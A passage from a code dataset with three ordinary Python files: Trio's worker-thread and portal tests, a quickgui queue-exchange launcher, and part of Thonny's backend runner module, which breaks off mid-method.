source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_threads.py | import threading
import queue as stdlib_queue
import time
import pytest
from .. import _core
from .. import Event, CapacityLimiter, sleep
from ..testing import wait_all_tasks_blocked
from .._threads import *
from .._core.tests.test_ki import ki_self
from .._core.tests.tutil import slow
async def test_do_in_trio_thread():
    """Check BlockingTrioPortal.run_sync / .run: calls issued from a worker
    thread execute in the Trio thread, and both return values and exceptions
    propagate back to the calling thread."""
    trio_thread = threading.current_thread()

    async def check_case(do_in_trio_thread, fn, expected):
        # Run `fn` through the portal from a fresh daemon thread and verify
        # the recorded sequence of events.
        record = []

        def threadfn():
            try:
                record.append(("start", threading.current_thread()))
                x = do_in_trio_thread(fn, record)
                record.append(("got", x))
            except BaseException as exc:
                print(exc)
                record.append(("error", type(exc)))

        child_thread = threading.Thread(target=threadfn, daemon=True)
        child_thread.start()
        # Keep checkpointing so the Trio loop can service the portal calls
        # while we wait for the worker thread to finish.
        while child_thread.is_alive():
            print("yawn")
            await sleep(0.01)
        assert record == [
            ("start", child_thread), ("f", trio_thread), expected
        ]

    portal = BlockingTrioPortal()

    # Case 1: sync function returning normally.
    def f(record):
        assert not _core.currently_ki_protected()
        record.append(("f", threading.current_thread()))
        return 2

    await check_case(portal.run_sync, f, ("got", 2))

    # Case 2: sync function raising.
    def f(record):
        assert not _core.currently_ki_protected()
        record.append(("f", threading.current_thread()))
        raise ValueError

    await check_case(portal.run_sync, f, ("error", ValueError))

    # Case 3: async function returning normally.
    async def f(record):
        assert not _core.currently_ki_protected()
        await _core.checkpoint()
        record.append(("f", threading.current_thread()))
        return 3

    await check_case(portal.run, f, ("got", 3))

    # Case 4: async function raising.
    async def f(record):
        assert not _core.currently_ki_protected()
        await _core.checkpoint()
        record.append(("f", threading.current_thread()))
        raise KeyError

    await check_case(portal.run, f, ("error", KeyError))
async def test_do_in_trio_thread_from_trio_thread():
    """Using a portal from inside the Trio thread itself must be rejected."""
    portal = BlockingTrioPortal()

    with pytest.raises(RuntimeError):
        portal.run_sync(lambda: None)  # pragma: no branch

    async def async_fn():  # pragma: no cover
        pass

    with pytest.raises(RuntimeError):
        portal.run(async_fn)
async def test_BlockingTrioPortal_with_explicit_TrioToken():
    """A portal built from an explicit TrioToken works from a foreign thread."""
    token = _core.current_trio_token()

    def thread_body(token):
        # Off the Trio thread, tokenless construction must fail...
        with pytest.raises(RuntimeError):
            BlockingTrioPortal()
        # ...but an explicit token gives a working portal.
        return BlockingTrioPortal(token).run_sync(threading.current_thread)

    result = await run_sync_in_worker_thread(thread_body, token)
    assert result == threading.current_thread()
def test_run_in_trio_thread_ki():
    # if we get a control-C during a run_in_trio_thread, then it propagates
    # back to the caller (slick!)
    record = set()

    async def check_run_in_trio_thread():
        portal = BlockingTrioPortal()

        def trio_thread_fn():
            # Executed (via the portal) inside the Trio thread; delivers a
            # simulated KeyboardInterrupt to that thread.
            print("in Trio thread")
            assert not _core.currently_ki_protected()
            print("ki_self")
            try:
                ki_self()
            finally:
                import sys
                print("finally", sys.exc_info())

        async def trio_thread_afn():
            trio_thread_fn()

        def external_thread_fn():
            # Runs outside Trio; the KI raised in the Trio thread is expected
            # to surface here, in the portal caller, for both sync and async.
            try:
                print("running")
                portal.run_sync(trio_thread_fn)
            except KeyboardInterrupt:
                print("ok1")
                record.add("ok1")
            try:
                portal.run(trio_thread_afn)
            except KeyboardInterrupt:
                print("ok2")
                record.add("ok2")

        thread = threading.Thread(target=external_thread_fn)
        thread.start()
        print("waiting")
        # Checkpoint while waiting so the portal calls get serviced.
        while thread.is_alive():
            await sleep(0.01)
        print("waited, joining")
        thread.join()
        print("done")

    _core.run(check_run_in_trio_thread)
    assert record == {"ok1", "ok2"}
def test_await_in_trio_thread_while_main_exits():
    # If the Trio run exits while a portal.run() call is still pending in a
    # foreign thread, that call should raise Cancelled rather than hang.
    record = []
    ev = Event()

    async def trio_fn():
        record.append("sleeping")
        ev.set()
        # Park indefinitely; only cancellation (from the run shutting down)
        # can wake us.
        await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)

    def thread_fn(portal):
        try:
            portal.run(trio_fn)
        except _core.Cancelled:
            record.append("cancelled")

    async def main():
        portal = BlockingTrioPortal()
        thread = threading.Thread(target=thread_fn, args=(portal,))
        thread.start()
        await ev.wait()
        assert record == ["sleeping"]
        # Return (ending the Trio run) while the cross-thread call is still
        # in flight.
        return thread

    thread = _core.run(main)
    thread.join()
    assert record == ["sleeping", "cancelled"]
async def test_run_in_worker_thread():
    """Basic success and exception paths of run_sync_in_worker_thread."""
    main_thread = threading.current_thread()

    def identify(value):
        # Report which thread actually ran the function.
        return (value, threading.current_thread())

    result, worker = await run_sync_in_worker_thread(identify, 1)
    assert result == 1
    assert worker != main_thread

    def boom():
        raise ValueError(threading.current_thread())

    with pytest.raises(ValueError) as excinfo:
        await run_sync_in_worker_thread(boom)
    print(excinfo.value.args)
    assert excinfo.value.args[0] != main_thread
async def test_run_in_worker_thread_cancellation():
    """Cancellable threads abandon the task (not the OS thread); plain
    threads shield the task until the thread completes; and cancellation
    before entry is itself a checkpoint."""
    register = [None]

    def f(q):
        # Make the thread block for a controlled amount of time
        register[0] = "blocking"
        q.get()
        register[0] = "finished"

    async def child(q, cancellable):
        record.append("start")
        try:
            return await run_sync_in_worker_thread(
                f, q, cancellable=cancellable
            )
        finally:
            record.append("exit")

    record = []
    q = stdlib_queue.Queue()
    async with _core.open_nursery() as nursery:
        nursery.start_soon(child, q, True)
        # Give it a chance to get started. (This is important because
        # run_sync_in_worker_thread does a checkpoint_if_cancelled before
        # blocking on the thread, and we don't want to trigger this.)
        await wait_all_tasks_blocked()
        assert record == ["start"]
        # Then cancel it.
        nursery.cancel_scope.cancel()
    # The task exited, but the thread didn't:
    assert register[0] != "finished"
    # Put the thread out of its misery:
    q.put(None)
    while register[0] != "finished":
        time.sleep(0.01)

    # This one can't be cancelled
    record = []
    register[0] = None
    async with _core.open_nursery() as nursery:
        nursery.start_soon(child, q, False)
        await wait_all_tasks_blocked()
        nursery.cancel_scope.cancel()
        # Shielded checkpoints let the scheduler run without letting the
        # cancellation reach the shielded child.
        with _core.CancelScope(shield=True):
            for _ in range(10):
                await _core.checkpoint()
        # It's still running
        assert record == ["start"]
        q.put(None)
        # Now it exits

    # But if we cancel *before* it enters, the entry is itself a cancellation
    # point
    with _core.CancelScope() as scope:
        scope.cancel()
        await child(q, False)
    assert scope.cancelled_caught
# Make sure that if trio.run exits, and then the thread finishes, then that's
# handled gracefully. (Requires that the thread result machinery be prepared
# for call_soon to raise RunFinishedError.)
def test_run_in_worker_thread_abandoned(capfd):
    """A worker thread that outlives trio.run must finish silently (the
    result machinery tolerates RunFinishedError from call_soon)."""
    q1 = stdlib_queue.Queue()
    q2 = stdlib_queue.Queue()

    def thread_fn():
        # Blocks until after the Trio run has already exited.
        q1.get()
        q2.put(threading.current_thread())

    async def main():
        async def child():
            await run_sync_in_worker_thread(thread_fn, cancellable=True)

        async with _core.open_nursery() as nursery:
            nursery.start_soon(child)
            await wait_all_tasks_blocked()
            # Abandon the thread by cancelling its (cancellable) task.
            nursery.cancel_scope.cancel()

    _core.run(main)
    # Trio has exited; now let the abandoned thread proceed.
    q1.put(None)
    # This makes sure:
    # - the thread actually ran
    # - that thread has finished before we check for its output
    thread = q2.get()
    while thread.is_alive():
        time.sleep(0.01)  # pragma: no cover
    # Make sure we don't have a "Exception in thread ..." dump to the console:
    out, err = capfd.readouterr()
    assert not out and not err
@pytest.mark.parametrize("MAX", [3, 5, 10])
@pytest.mark.parametrize("cancel", [False, True])
@pytest.mark.parametrize("use_default_limiter", [False, True])
async def test_run_in_worker_thread_limiter(MAX, cancel, use_default_limiter):
    # This test is a bit tricky. The goal is to make sure that if we set
    # limiter=CapacityLimiter(MAX), then in fact only MAX threads are ever
    # running at a time, even if there are more concurrent calls to
    # run_sync_in_worker_thread, and even if some of those are cancelled. And
    # also to make sure that the default limiter actually limits.
    COUNT = 2 * MAX
    gate = threading.Event()
    lock = threading.Lock()
    if use_default_limiter:
        c = current_default_worker_thread_limiter()
        orig_total_tokens = c.total_tokens
        c.total_tokens = MAX
        limiter_arg = None
    else:
        c = CapacityLimiter(MAX)
        orig_total_tokens = MAX
        limiter_arg = c
    try:
        # We used to use regular variables and 'nonlocal' here, but it turns
        # out that it's not safe to assign to closed-over variables that are
        # visible in multiple threads, at least as of CPython 3.6 and PyPy
        # 5.8:
        #
        # https://bugs.python.org/issue30744
        # https://bitbucket.org/pypy/pypy/issues/2591/
        #
        # Mutating them in-place is OK though (as long as you use proper
        # locking etc.).
        class state:
            pass
        state.ran = 0
        state.high_water = 0
        state.running = 0
        state.parked = 0
        portal = BlockingTrioPortal()

        def thread_fn(cancel_scope):
            print("thread_fn start")
            # Cancel our own scope once we're definitely running; in the
            # `cancel` case the task then abandons us mid-flight.
            portal.run_sync(cancel_scope.cancel)
            with lock:
                state.ran += 1
                state.running += 1
                state.high_water = max(state.high_water, state.running)
                # The Trio thread below watches this value and uses it as a
                # signal that all the stats calculations have finished.
                state.parked += 1
            gate.wait()
            with lock:
                state.parked -= 1
                state.running -= 1
            print("thread_fn exiting")

        async def run_thread(event):
            with _core.CancelScope() as cancel_scope:
                await run_sync_in_worker_thread(
                    thread_fn,
                    cancel_scope,
                    limiter=limiter_arg,
                    cancellable=cancel
                )
            print(
                "run_thread finished, cancelled:",
                cancel_scope.cancelled_caught
            )
            event.set()

        async with _core.open_nursery() as nursery:
            print("spawning")
            events = []
            for i in range(COUNT):
                events.append(Event())
                nursery.start_soon(run_thread, events[-1])
                await wait_all_tasks_blocked()
            # In the cancel case, we in particular want to make sure that the
            # cancelled tasks don't release the semaphore. So let's wait until
            # at least one of them has exited, and that everything has had a
            # chance to settle down from this, before we check that everyone
            # who's supposed to be waiting is waiting:
            if cancel:
                print("waiting for first cancellation to clear")
                await events[0].wait()
                await wait_all_tasks_blocked()
            # Then wait until the first MAX threads are parked in gate.wait(),
            # and the next MAX threads are parked on the semaphore, to make
            # sure no-one is sneaking past, and to make sure the high_water
            # check below won't fail due to scheduling issues. (It could still
            # fail if too many threads are let through here.)
            while state.parked != MAX or c.statistics().tasks_waiting != MAX:
                await sleep(0.01)  # pragma: no cover
            # Then release the threads
            gate.set()
        assert state.high_water == MAX
        if cancel:
            # Some threads might still be running; need to wait to them to
            # finish before checking that all threads ran. We can do this
            # using the CapacityLimiter.
            while c.borrowed_tokens > 0:
                await sleep(0.01)  # pragma: no cover
        assert state.ran == COUNT
        assert state.running == 0
    finally:
        # Restore the (possibly shared default) limiter's capacity.
        c.total_tokens = orig_total_tokens
async def test_run_in_worker_thread_custom_limiter():
    """Only the documented acquire/release-on-behalf-of API is invoked on a
    user-supplied limiter object."""
    calls = []

    class CustomLimiter:
        async def acquire_on_behalf_of(self, borrower):
            calls.append("acquire")
            self._borrower = borrower

        def release_on_behalf_of(self, borrower):
            calls.append("release")
            # The same borrower token must be passed back on release.
            assert borrower == self._borrower

    await run_sync_in_worker_thread(lambda: None, limiter=CustomLimiter())
    assert calls == ["acquire", "release"]
async def test_run_in_worker_thread_limiter_error():
    """An exception from the limiter's release hook propagates, chaining
    with any error the thread function itself raised."""
    record = []

    class BadCapacityLimiter:
        async def acquire_on_behalf_of(self, borrower):
            record.append("acquire")

        def release_on_behalf_of(self, borrower):
            record.append("release")
            raise ValueError

    bs = BadCapacityLimiter()

    # Thread fn succeeds, so the release error surfaces alone (no context).
    with pytest.raises(ValueError) as excinfo:
        await run_sync_in_worker_thread(lambda: None, limiter=bs)
    assert excinfo.value.__context__ is None
    assert record == ["acquire", "release"]

    record = []
    # If the original function raised an error, then the semaphore error
    # chains with it
    d = {}
    with pytest.raises(ValueError) as excinfo:
        await run_sync_in_worker_thread(lambda: d["x"], limiter=bs)
    assert isinstance(excinfo.value.__context__, KeyError)
    assert record == ["acquire", "release"]
async def test_run_in_worker_thread_fail_to_spawn(monkeypatch):
    """If Thread.start() itself fails, the error propagates and the limiter
    token is cleanly released."""

    def broken_start(self):
        raise RuntimeError("the engines canna take it captain")

    monkeypatch.setattr(threading.Thread, "start", broken_start)

    limiter = current_default_worker_thread_limiter()
    assert limiter.borrowed_tokens == 0

    # We get an appropriate error, and the limiter is cleanly released
    with pytest.raises(RuntimeError) as excinfo:
        await run_sync_in_worker_thread(lambda: None)  # pragma: no cover
    assert "engines" in str(excinfo.value)
    assert limiter.borrowed_tokens == 0
|
launcher_exchange.py | '''
A simple application that binds together a task and a GUI.
Both task and GUI must be callables and accept
two arguments in order to receive the
communication queues.
'''
import queue
import select
import threading
from collections.abc import Iterable
from quickgui.framework.queues import NewLineQueue
from quickgui.framework.quick_base import time_to_die, set_time_to_die
class Exchange():
    '''
    Central exchange for queues.

    Incoming messages from any queue are replicated to all output queues,
    except for the ones in the same category.
    '''

    def __init__(self):
        self.qins = []
        self.qouts = []

    def get(self, category=''):
        '''Create, register and return a new (qin, qout) pair tagged
        with *category*.'''
        pair = (NewLineQueue(), NewLineQueue())
        for q in pair:
            q.category = category
        self.qins.append(pair[0])
        self.qouts.append(pair[1])
        return pair

    def run(self):
        '''Pump messages between queues until the shutdown flag is set.'''
        while not time_to_die():
            ready, _, _ = select.select(self.qouts, [], [])
            for source in ready:
                message = source.get(block=False)
                for sink in self.qins:
                    # Never echo back into the producer's own category.
                    if sink.category == source.category:
                        continue
                    try:
                        sink.put(message, block=False)
                    except queue.Full:
                        # Best-effort delivery: drop for congested consumers.
                        pass
def start(task=None, gui=None, task_servers=None, gui_client=None):
    '''
    App launcher

    task = task running in background
    gui: GUI running in foreground
    task_servers: optional server(s) for task, for remote connections
    gui_client: optional client for GUI, for remote connections

    This launcher uses the class Exchange above to simplify
    the queue plumbing.
    However the exchange causes rapid message inflation for anything but
    the simplest topologies.
    '''
    if task_servers is None:
        task_servers = []
    elif not isinstance(task_servers, Iterable):
        # Allow passing a single server instead of a sequence.
        task_servers = [task_servers]
    if task_servers and not task:
        raise Exception('Task servers can only be started together with tasks')
    if gui_client and task:
        raise Exception('GUI client can be started with GUIs only')
    joinables = []
    exchange = Exchange()
    for i, server in enumerate(task_servers):
        # Servers see the queue pair swapped relative to the exchange.
        qin, qout = exchange.get('task_server')
        t = threading.Thread(target=server, args=(qout, qin))
        t.start()
        joinables.append(t)
    if task:
        qin, qout = exchange.get('task')
        t = threading.Thread(target=task, args=(qin, qout))
        t.start()
        joinables.append(t)
    if gui_client:
        # Client also gets swapped queues, like the servers.
        qin, qout = exchange.get('gui_client')
        t = threading.Thread(target=gui_client, args=(qout, qin))
        t.start()
        joinables.append(t)
    # Start GUI in foreground
    # This call will block until the gui quits.
    if gui:
        qin, qout = exchange.get('gui')
    # NOTE(review): the exchange pump thread is neither a daemon nor joined
    # below; presumably it exits once set_time_to_die(True) takes effect —
    # confirm it cannot stay blocked in select() after shutdown.
    threading.Thread(target=exchange.run).start()
    if gui:
        gui(qin, qout)
    set_time_to_die(True)
    for joinable in joinables:
        joinable.join()
def self_contained_app(task, gui):
    '''Run *task* in a background thread and *gui* in the foreground,
    wired directly with a pair of queues (no exchange).'''
    to_task = NewLineQueue()
    from_task = NewLineQueue()
    # Spawn the background task.
    worker = threading.Thread(target=task, args=(to_task, from_task))
    worker.start()
    # The GUI sees the pair reversed: it reads what the task writes.
    gui(from_task, to_task)
    # GUI has quit: ask the task to stop, then wait for it.
    to_task.put('quit')
    worker.join()
|
running.py | # -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import shlex
import shutil
import signal
import subprocess
import sys
import time
from logging import debug
from threading import Thread
from time import sleep
from tkinter import ttk
from thonny import THONNY_USER_DIR, common, get_runner, get_shell, get_workbench, ui_utils
from thonny.code import get_current_breakpoints, get_saved_current_script_filename, is_remote_path
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
normpath_with_actual_case,
is_same_path,
parse_message,
path_startswith,
serialize_message,
update_system_path,
)
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from typing import Any, List, Optional, Sequence, Set # @UnusedImport; @UnusedImport
from thonny.terminal import run_in_terminal
from thonny.ui_utils import select_sequence, show_dialog, CommonDialogEx
from tkinter import messagebox
WINDOWS_EXE = "python.exe"
# presumably a threshold for merging small output chunks into one shell
# event — TODO confirm against usage elsewhere in the module
OUTPUT_MERGE_THRESHOLD = 1000
RUN_COMMAND_LABEL = ""  # init later when gettext is ready
RUN_COMMAND_CAPTION = ""
# Placeholder substituted with the editor's content when the script has no
# usable local path (see Runner.execute_script).
EDITOR_CONTENT_TOKEN = "$EDITOR_CONTENT"
# Exit code signalling a deliberate backend termination (no crash report).
EXPECTED_TERMINATION_CODE = 1234
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
class Runner:
    """Maintains the backend process via a BackendProxy: starts/stops it,
    polls its messages into workbench events, and routes commands to it."""

    def __init__(self) -> None:
        get_workbench().set_default("run.auto_cd", True)
        self._init_commands()
        self._state = "starting"
        self._proxy = None  # type: Any
        # True while backend messages are being published as events; commands
        # issued by event handlers are postponed during that window.
        self._publishing_events = False
        self._polling_after_id = None
        self._postponed_commands = []  # type: List[CommandToBackend]

    def _remove_obsolete_jedi_copies(self) -> None:
        # Thonny 2.1 used to copy jedi in order to make it available
        # for the backend. Get rid of it now
        for item in os.listdir(THONNY_USER_DIR):
            if item.startswith("jedi_0."):
                shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)

    def start(self) -> None:
        """Perform startup: console check, first backend, old-jedi cleanup."""
        self._check_alloc_console()
        self.restart_backend(False, True)
        # temporary
        self._remove_obsolete_jedi_copies()

    def _init_commands(self) -> None:
        """Register all run-related commands with the workbench."""
        global RUN_COMMAND_CAPTION, RUN_COMMAND_LABEL
        RUN_COMMAND_LABEL = _("Run current script")
        RUN_COMMAND_CAPTION = _("Run")
        get_workbench().set_default("run.run_in_terminal_python_repl", False)
        get_workbench().set_default("run.run_in_terminal_keep_open", True)
        try:
            import thonny.plugins.debugger  # @UnusedImport
            debugger_available = True
        except ImportError:
            debugger_available = False
        get_workbench().add_command(
            "run_current_script",
            "run",
            RUN_COMMAND_LABEL,
            caption=RUN_COMMAND_CAPTION,
            handler=self.cmd_run_current_script,
            default_sequence="<F5>",
            extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
            tester=self.cmd_run_current_script_enabled,
            group=10,
            image="run-current-script",
            include_in_toolbar=not (get_workbench().in_simple_mode() and debugger_available),
            show_extra_sequences=True,
        )
        get_workbench().add_command(
            "run_current_script_in_terminal",
            "run",
            _("Run current script in terminal"),
            caption="RunT",
            handler=self._cmd_run_current_script_in_terminal,
            default_sequence="<Control-t>",
            extra_sequences=["<<CtrlTInText>>"],
            tester=self._cmd_run_current_script_in_terminal_enabled,
            group=35,
            image="terminal",
        )
        get_workbench().add_command(
            "restart",
            "run",
            _("Stop/Restart backend"),
            caption=_("Stop"),
            handler=self.cmd_stop_restart,
            default_sequence="<Control-F2>",
            group=100,
            image="stop",
            include_in_toolbar=True,
        )
        get_workbench().add_command(
            "interrupt",
            "run",
            _("Interrupt execution"),
            handler=self._cmd_interrupt,
            tester=self._cmd_interrupt_enabled,
            default_sequence="<Control-c>",
            group=100,
            bell_when_denied=False,
        )
        get_workbench().add_command(
            "softreboot",
            "run",
            _("Send EOF / Soft reboot"),
            self.soft_reboot,
            self.soft_reboot_enabled,
            group=100,
            default_sequence="<Control-d>",
            extra_sequences=["<<CtrlDInText>>"],
        )
        get_workbench().add_command(
            "disconnect",
            "run",
            _("Disconnect"),
            self.disconnect,
            self.disconnect_enabled,
            group=100,
        )

    def get_state(self) -> str:
        """State is one of "running", "waiting_debugger_command", "waiting_toplevel_command"
        """
        return self._state

    def _set_state(self, state: str) -> None:
        # Log only actual transitions.
        if self._state != state:
            logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
            self._state = state

    def is_running(self):
        return self._state == "running"

    def is_waiting(self):
        # Covers both waiting_toplevel_command and waiting_debugger_command.
        return self._state.startswith("waiting")

    def is_waiting_toplevel_command(self):
        return self._state == "waiting_toplevel_command"

    def is_waiting_debugger_command(self):
        return self._state == "waiting_debugger_command"

    def get_sys_path(self) -> List[str]:
        """Return the backend interpreter's sys.path (delegated to proxy)."""
        return self._proxy.get_sys_path()

    def send_command(self, cmd: CommandToBackend) -> None:
        """Validate, enrich and forward *cmd* to the backend proxy.

        May postpone the command (while events are being published, or when
        the proxy answers "postpone") or silently drop it ("discard" / wrong
        state). For blocking commands, shows a dialog and returns its
        response."""
        if self._proxy is None:
            return
        if self._publishing_events:
            # allow all event handlers to complete before sending the commands
            # issued by first event handlers
            self._postpone_command(cmd)
            return
        # First sanity check
        if (
            isinstance(cmd, ToplevelCommand)
            and not self.is_waiting_toplevel_command()
            and cmd.name not in ["Reset", "Run", "Debug"]
            or isinstance(cmd, DebuggerCommand)
            and not self.is_waiting_debugger_command()
        ):
            get_workbench().bell()
            logging.warning(
                "RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
            )
            return
        # Attach extra info
        if "debug" in cmd.name.lower():
            cmd["breakpoints"] = get_current_breakpoints()
        if "id" not in cmd:
            cmd["id"] = generate_command_id()
        # Offer the command
        logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
        response = self._proxy.send_command(cmd)
        if response == "discard":
            return
        elif response == "postpone":
            self._postpone_command(cmd)
            return
        else:
            assert response is None
            get_workbench().event_generate("CommandAccepted", command=cmd)
        if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
            self._set_state("running")
            # Capitalized command names signal a fresh top-level run.
            if cmd.name[0].isupper():
                get_workbench().event_generate("BackendRestart", full=False)
        if cmd.get("blocking"):
            dlg = BlockingDialog(get_workbench(), cmd)
            show_dialog(dlg)
            return dlg.response

    def _postpone_command(self, cmd: CommandToBackend) -> None:
        # in case of InlineCommands, discard older same type command
        if isinstance(cmd, InlineCommand):
            for older_cmd in self._postponed_commands:
                if older_cmd.name == cmd.name:
                    self._postponed_commands.remove(older_cmd)
        if len(self._postponed_commands) > 10:
            logging.warning("Can't pile up too many commands. This command will be just ignored")
        else:
            self._postponed_commands.append(cmd)

    def _send_postponed_commands(self) -> None:
        """Re-send everything queued by _postpone_command."""
        todo = self._postponed_commands
        self._postponed_commands = []
        for cmd in todo:
            logging.debug("Sending postponed command: %s", cmd)
            self.send_command(cmd)

    def send_program_input(self, data: str) -> None:
        """Forward stdin data to the running program."""
        assert self.is_running()
        self._proxy.send_program_input(data)

    def execute_script(
        self,
        script_path: str,
        args: List[str],
        working_directory: Optional[str] = None,
        command_name: str = "Run",
    ) -> None:
        """Build a magic command line (optionally prefixed by %cd) and
        submit it to the shell, which performs the actual execution."""
        if working_directory is not None and get_workbench().get_local_cwd() != working_directory:
            # create compound command
            # start with %cd
            cd_cmd_line = construct_cd_command(working_directory) + "\n"
            next_cwd = working_directory
        else:
            # create simple command
            cd_cmd_line = ""
            next_cwd = get_workbench().get_local_cwd()
        if not is_remote_path(script_path) and self._proxy.uses_local_filesystem():
            rel_filename = os.path.relpath(script_path, next_cwd)
            cmd_parts = ["%" + command_name, rel_filename] + args
        else:
            # No usable local path: send the editor content instead.
            cmd_parts = ["%" + command_name, "-c", EDITOR_CONTENT_TOKEN] + args
        exe_cmd_line = construct_cmd_line(cmd_parts, [EDITOR_CONTENT_TOKEN]) + "\n"
        # submit to shell (shell will execute it)
        get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)

    def execute_current(self, command_name: str) -> None:
        """
        This method's job is to create a command for running/debugging
        current file/script and submit it to shell
        """
        if not self.is_waiting_toplevel_command():
            self.restart_backend(True, False, 2)
        filename = get_saved_current_script_filename()
        if not filename:
            # user has cancelled file saving
            return
        if is_remote_path(filename) or not self._proxy.uses_local_filesystem():
            working_directory = None
        else:
            # changing dir may be required
            script_dir = os.path.dirname(filename)
            if get_workbench().get_option("run.auto_cd") and command_name[0].isupper():
                working_directory = script_dir  # type: Optional[str]
            else:
                working_directory = None
        args = self._get_active_arguments()
        self.execute_script(filename, args, working_directory, command_name)

    def _get_active_arguments(self):
        """Return program arguments from the UI, shell-split, or []."""
        if get_workbench().get_option("view.show_program_arguments"):
            args_str = get_workbench().get_option("run.program_arguments")
            get_workbench().log_program_arguments_string(args_str)
            return shlex.split(args_str)
        else:
            return []

    def cmd_run_current_script_enabled(self) -> bool:
        return (
            get_workbench().get_editor_notebook().get_current_editor() is not None
            and "run" in get_runner().get_supported_features()
        )

    def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
        return (
            self._proxy
            and "run_in_terminal" in self._proxy.get_supported_features()
            and self.cmd_run_current_script_enabled()
        )

    def cmd_run_current_script(self) -> None:
        if get_workbench().in_simple_mode():
            get_workbench().hide_view("VariablesView")
        self.execute_current("Run")

    def _cmd_run_current_script_in_terminal(self) -> None:
        filename = get_saved_current_script_filename()
        self._proxy.run_script_in_terminal(
            filename,
            self._get_active_arguments(),
            get_workbench().get_option("run.run_in_terminal_python_repl"),
            get_workbench().get_option("run.run_in_terminal_keep_open"),
        )

    def _cmd_interrupt(self) -> None:
        if self._proxy is not None:
            self._proxy.interrupt()
        else:
            logging.warning("Interrupting without proxy")

    def _cmd_interrupt_enabled(self) -> bool:
        if not self._proxy or not self._proxy.is_functional():
            return False
        # TODO: distinguish command and Ctrl+C shortcut
        widget = get_workbench().focus_get()
        if not running_on_mac_os():  # on Mac Ctrl+C is not used for Copy
            if widget is not None and hasattr(widget, "selection_get"):
                try:
                    selection = widget.selection_get()
                    if isinstance(selection, str) and len(selection) > 0:
                        # assuming user meant to copy, not interrupt
                        # (IDLE seems to follow same logic)
                        return False
                except Exception:
                    # selection_get() gives error when calling without selection on Ubuntu
                    pass
        return self.is_running() or self.is_waiting_toplevel_command()

    def cmd_stop_restart(self) -> None:
        if get_workbench().in_simple_mode():
            get_workbench().hide_view("VariablesView")
        self.restart_backend(True)

    def disconnect(self):
        proxy = self.get_backend_proxy()
        assert hasattr(proxy, "disconnect")
        proxy.disconnect()

    def disconnect_enabled(self):
        return hasattr(self.get_backend_proxy(), "disconnect")

    def soft_reboot(self):
        # Only proxies exposing _soft_reboot_and_run_main support this.
        proxy = self.get_backend_proxy()
        if hasattr(proxy, "_soft_reboot_and_run_main"):
            return proxy._soft_reboot_and_run_main()
        return None

    def soft_reboot_enabled(self):
        proxy = self.get_backend_proxy()
        return proxy and proxy.is_functional() and hasattr(proxy, "_soft_reboot_and_run_main")

    def _poll_vm_messages(self) -> None:
        """I chose polling instead of event_generate in listener thread,
        because event_generate across threads is not reliable
        http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
        """
        self._polling_after_id = None
        if self._pull_vm_messages() is False:
            return
        self._polling_after_id = get_workbench().after(20, self._poll_vm_messages)

    def _pull_vm_messages(self):
        """Drain the proxy's message queue; return False to stop polling
        (backend crashed or is being restarted)."""
        while self._proxy is not None:
            try:
                msg = self._proxy.fetch_next_message()
                if not msg:
                    break
                logging.debug(
                    "RUNNER GOT: %s, %s in state: %s", msg.event_type, msg, self.get_state()
                )
            except BackendTerminatedError as exc:
                self._report_backend_crash(exc)
                self.destroy_backend()
                return False
            if msg.get("SystemExit", False):
                self.restart_backend(True)
                return False
            # change state
            if isinstance(msg, ToplevelResponse):
                self._set_state("waiting_toplevel_command")
            elif isinstance(msg, DebuggerResponse):
                self._set_state("waiting_debugger_command")
            else:
                "other messages don't affect the state"
            if "cwd" in msg:
                if not self.has_own_filesystem():
                    get_workbench().set_local_cwd(msg["cwd"])
            # Publish the event
            # NB! This may cause another command to be sent before we get to postponed commands.
            try:
                self._publishing_events = True
                class_event_type = type(msg).__name__
                get_workbench().event_generate(class_event_type, event=msg)  # more general event
                if msg.event_type != class_event_type:
                    # more specific event
                    get_workbench().event_generate(msg.event_type, event=msg)
            finally:
                self._publishing_events = False
            # TODO: is it necessary???
            # https://stackoverflow.com/a/13520271/261181
            # get_workbench().update()
        self._send_postponed_commands()

    def _report_backend_crash(self, exc: Exception) -> None:
        """Show a termination notice in the shell (suppressed for the
        expected/deliberate termination code)."""
        returncode = getattr(exc, "returncode", "?")
        err = "Backend terminated or disconnected."
        try:
            faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
            if os.path.exists(faults_file):
                with open(faults_file, encoding="ASCII") as fp:
                    err += fp.read()
        except Exception:
            logging.exception("Failed retrieving backend faults")
        err = err.strip() + " Use 'Stop/Restart' to restart ...\n"
        if returncode != EXPECTED_TERMINATION_CODE:
            get_workbench().event_generate("ProgramOutput", stream_name="stderr", data="\n" + err)
        get_workbench().become_active_window(False)

    def restart_backend(self, clean: bool, first: bool = False, wait: float = 0) -> None:
        """Recreate (or replace) backend proxy / backend process."""
        if not first:
            get_shell().restart()
            get_shell().update_idletasks()
        self.destroy_backend()
        backend_name = get_workbench().get_option("run.backend_name")
        if backend_name not in get_workbench().get_backends():
            raise UserError(
                "Can't find backend '{}'. Please select another backend from options".format(
                    backend_name
                )
            )
        backend_class = get_workbench().get_backends()[backend_name].proxy_class
        self._set_state("running")
        self._proxy = None
        self._proxy = backend_class(clean)
        self._poll_vm_messages()
        if wait:
            # Pump the UI until the backend reports ready or `wait` expires.
            start_time = time.time()
            while not self.is_waiting_toplevel_command() and time.time() - start_time <= wait:
                # self._pull_vm_messages()
                get_workbench().update()
                sleep(0.01)
        get_workbench().event_generate("BackendRestart", full=True)

    def destroy_backend(self) -> None:
        """Stop polling, drop queued commands and tear down the proxy."""
        if self._polling_after_id is not None:
